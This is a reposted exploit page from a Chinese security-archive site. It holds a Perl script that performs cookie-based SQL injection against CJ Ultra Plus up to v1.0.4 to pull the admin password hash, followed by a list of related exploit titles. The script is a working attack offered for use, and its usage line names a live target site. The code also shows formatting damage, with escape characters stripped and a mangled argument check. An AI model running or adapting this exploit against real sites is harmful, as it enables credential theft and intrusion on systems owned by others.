手机
当前位置:查字典教程网 >网络安全 >Exploit >CJ Ultra Plus
CJ Ultra Plus
摘要:#!/usr/bin/perl##CJUltraPlus>>GretzZz2:pronoobz.org-Wesker,ChinaSunand...

#!/usr/bin/perl

#

# CJ Ultra Plus <= v1.0.4 Cookie SQL Injection

#

# found and coded by -SmoG- /GermAn hAckZ0r

# contact: ICQ - 266836394

#

#

#

#

# hints: - sometimes the parameter "SID" is different to the normal one...

# - i extract the hash from the html-code... but i was 2 lazy for coding a good working filter

# - salted DES (normaly "aa" will be the salt, but it can be different)

# - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...

#

#

# >>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<<

use LWP::UserAgent;

if ($#ARGV 1 !=1) {

print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "found and coded by -SmoG-n";

print "nnUsage: perl xploit.pl -victimn";

print " perl xploit.pl http://gayxboy.com/nn"; #LiVe-Dem0! letZz pwnz the pedophile!!

exit();

}

print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "nstarting exploit...";

$target=$ARGV[0];

chomp($target);

if($target !~ /^http:///)

{

$target = "http://".$target;

}

if($target !~ //$/)

{

$target .= "/";

}

@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");

$ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

$response = $ua->get($target, @header);

if ($response->is_success)

{

$temp = $response->content;

if ($temp =~/(.*)SID=(.*);/)

{

$result=substr($temp,85,13);

print "nadminhash: "; print $result;

}

}

else

{

die "Error: ".$response->status_line;

}

【CJ Ultra Plus】相关文章:

WFTPD Pro Server

Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)

Safari Quicktime

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Ultrastats

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Dreampics Builder (page) Remote SQL Injection Vulnerability

精品推荐
分类导航